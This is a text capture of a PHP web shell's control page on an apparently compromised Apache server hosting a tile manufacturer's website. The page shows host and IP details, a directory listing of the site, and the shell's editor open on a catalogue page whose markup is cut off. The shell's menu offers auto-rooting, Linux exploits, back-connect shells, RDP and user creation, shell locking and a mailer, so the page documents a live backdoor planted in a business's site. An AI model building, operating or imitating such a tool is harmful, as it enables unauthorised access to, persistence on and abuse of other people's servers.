Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
844
B
-rw-r--r--
-----index.html
4.76
KB
-rw-rw-r--
---catalogue.php
74.37
KB
-rw-r--r--
360.php
15.2
KB
-rw-r--r--
73766.jpg
997.9
KB
-rw-r--r--
Cart.class.php
6.98
KB
-rw-r--r--
about-us.php
32.79
KB
-rw-r--r--
add_cart.php
325
B
-rw-r--r--
aj_get_color_test2.php
29.86
KB
-rw-r--r--
aj_get_finish_test2.php
29.31
KB
-rw-r--r--
aj_get_size_test.php
32.16
KB
-rw-r--r--
aj_more_post.php
9.05
KB
-rw-r--r--
aj_more_post_finish.php
8.56
KB
-rw-r--r--
annual-retuns.php
11.32
KB
-rw-r--r--
blog-post.php
13.56
KB
-rw-r--r--
blog.php
6.47
KB
-rw-r--r--
builder.php
36.27
KB
-rw-r--r--
career.php
26.97
KB
-rw-r--r--
cart.php
6.65
KB
-rw-r--r--
catalogue.php
81.01
KB
-rw-r--r--
certifications.php
43.86
KB
-rw-r--r--
clear_cart.php
142
B
-rw-r--r--
composer.json
70
B
-rw-r--r--
composer.lock
15.78
KB
-rw-r--r--
csr.php
33.49
KB
-rw-r--r--
dealer-1.php
27.75
KB
-rw-r--r--
dealer.php
84.36
KB
-rw-r--r--
dealerbkp.php
55.94
KB
-rw-r--r--
delete_item.php
394
B
-rw-r--r--
design_by_italy.php
14.43
KB
-rw-r--r--
event_details.php
6.45
KB
-rw-r--r--
fetch_collection.php
846
B
-rw-r--r--
fetch_finish.php
904
B
-rw-r--r--
fetch_sizes.php
906
B
-rw-r--r--
fetch_surfaces.php
812
B
-rw-r--r--
fpdf.css
1.31
KB
-rw-r--r--
fpdf.php
49.65
KB
-rw-r--r--
generate_pdf.php
2.78
KB
-rw-r--r--
global-export.php
101.88
KB
-rw-r--r--
global-market-1.php
17.76
KB
-rw-r--r--
id-mapping.json
16.73
KB
-rw-r--r--
index.php
129.78
KB
-rw-r--r--
interior-architecture-2.php
59
KB
-rw-r--r--
interior-architecture.php
67.44
KB
-rw-r--r--
landing_page.html
9.74
KB
-rw-r--r--
located-us.php
34.96
KB
-rw-r--r--
manufacturer-and-supplier.php
73.38
KB
-rw-r--r--
milestones.php
15.72
KB
-rw-r--r--
news-play.php
6.62
KB
-rw-r--r--
product-detail-2.php
41.38
KB
-rw-r--r--
product-detail.php
38.5
KB
-rw-r--r--
product-list-back.php
33.34
KB
-rw-r--r--
product-list.php
37.42
KB
-rw-r--r--
product-search.php
28.81
KB
-rw-r--r--
promoter-profile.php
8.8
KB
-rw-r--r--
robots.txt
99
B
-rw-r--r--
save_cart.php
269
B
-rw-r--r--
search_result_all.php
8.51
KB
-rw-r--r--
search_result_application.php
6.78
KB
-rw-r--r--
search_result_color.php
8.93
KB
-rw-r--r--
search_result_finish.php
8.87
KB
-rw-r--r--
search_result_size.php
7.24
KB
-rw-r--r--
server-smtp.php
3.3
KB
-rw-r--r--
server.php
1.19
KB
-rw-r--r--
showroom.php
2.19
KB
-rw-r--r--
sitemap.xml
60.69
KB
-rw-r--r--
tiles-calculator.php
25.23
KB
-rw-r--r--
view_cart.php
3.17
KB
-rw-r--r--
volume.php
47.04
KB
-rw-r--r--
volume_bkp.php
35.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ---catalogue.php
<?php include "inc/header.php";?> <script type="text/javascript"> window.onload(); document.getElementById("submit_form").disabled = true; function enableBtn(){ document.getElementById("submit_form").disabled = false; } </script> <script src="https://www.google.com/recaptcha/api.js"></script> <?php include "inc/menu.php";?> <style> .modalDialog { position: fixed; top: 0; right: 0; bottom: 0; left: 0; background: rgba(0,0,0,0.8); z-index: 99999; opacity:0; -webkit-transition: opacity 300ms ease-in; -moz-transition: opacity 300ms ease-in; transition: opacity 300ms ease-in; pointer-events: none; } .modalDialog:target { opacity:1; pointer-events: auto; } .modalDialog > div { width: 50%; position: relative; margin: 10% auto; padding: 5px 20px 13px 20px; } @media only screen and (min-width: 320px) and (max-width: 480px){ .modalDialog > div { width: 100%; position: relative; margin: 10% auto; padding: 5px 20px 13px 20px; } } .close { padding: 0; color:black; line-height: 25px; position: absolute; right: 10px; text-align: center; top: 10px; width: 24px; text-decoration: none; background:none; font-weight: bold; background: #bcbcbc; } .close:hover { color: #EA4436; } </style> <div id="qodef-page-outer"> <div class="qodef-page-title qodef-m qodef-title--breadcrumbs qodef-alignment--left qodef-vertical-alignment--header-bottom"> <div class="qodef-m-inner"> <div class="qodef-m-content qodef-content-full-width"> <div itemprop="breadcrumb" class="qodef-breadcrumbs"> <a itemprop="url" class="qodef-breadcrumbs-link" href="index.php"><span itemprop="title">Home</span></a><span class="qodef-breadcrumbs-separator"></span> <span itemprop="title" class="qodef-breadcrumbs-current">Catalogues</span> </div> <div itemprop="breadcrumb" class="qodef-breadcrumbs"> <h1 class="page-heading"> Catalogues </h1> </div> </div> </div> </div> <div id="qodef-page-inner"> <main id="qodef-page-content" class="qodef-grid qodef-layout--template" role="main"> <div class="qodef-grid-inner clear"> <div class="qodef-grid-item qodef-page-content-section qodef-col--12" style="padding: 0;"> <div data-elementor-type="wp-page" data-elementor-id="1903" class="elementor elementor-1903"> <section class="elementor-section elementor-top-section elementor-element elementor-element-d604ca2 elementor-section-full_width elementor-section-height-default elementor-section-height-default qodef-elementor-content-no qodef-elementor-column-no" data-id="e5ee8d4" data-element_type="section"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left qodef-title-break--disabled"> <h2 class="qodef-m-title"> Catalogue By Sizes </h2> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <span style="color: #269422; font-size: 18px;"><b>Success!! Now you can download any catalogues by clicking on them.</b></span> <?php } ?> </div> <br><br> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/600x600_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/600x600_GVT_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>600x600 GVT CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/600x600_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b> </a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/600x1200_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/600x1200_GVT_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>600x1200 GVT CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/600x1200_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/800x1600_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/800x1600_GVT_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>800x1600 GVT CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/800x1600_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/1200x1800_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/1200x1800_GVT_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>1200x1800 GVT CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/1200x1800_GVT_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> </div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/800x2400_SLABS_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/800x2400_SLABS_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>800x2400 SLABS CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/800x2400_SLABS_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/I_ROK_Full_Body_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/I_ROK_Full_Body_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>I ROK(Full Body) CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/I_ROK_Full_Body_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/Wood_Legacy_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/Wood_Legacy_ITALICA.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>WOOD LEGACY CATALOGUE </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/Wood_Legacy_ITALICA.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b> </a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> </div> </div> </section> <!-----------------------------------------------------------------------------------------------------------------------------------------------------------------> <section class="pt-0 elementor-section elementor-top-section elementor-element elementor-element-d604ca2 elementor-section-full_width elementor-section-height-default elementor-section-height-default qodef-elementor-content-no qodef-elementor-column-no" data-id="e5ee8d4" data-element_type="section"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left qodef-title-break--disabled"> <h3 class="qodef-m-title"> Catalogue By Finish </h3> </div> <br><br> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Converse_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Converse_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Converse </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Converse_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Dazzle_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Dazzle_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Dazzle </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Dazzle_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Dazzy_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Dazzy_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Dazzy </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Dazzy_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Fusion_+_Infinia_Fusion_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Fusion_+_Infinia_Fusion_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Fusion + Infinia Fusion </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Fusion_+_Infinia_Fusion_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b> PDF Download </b></a> </p> </div> </div> </div> </div> </div> </div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Glamour_+_Infinia_Glamour_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Glamour_+_Infinia_Glamour_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Glamour + Infinia Glamour </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Glamour_+_Infinia_Glamour_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Grezzo_R10_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Grezzo_R10_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Grezzo R10 </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Grezzo_R10_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Gritty_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Gritty_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Gritty </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Gritty_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_I_ROK_Full_Body_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_I_ROK_Full_Body_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title 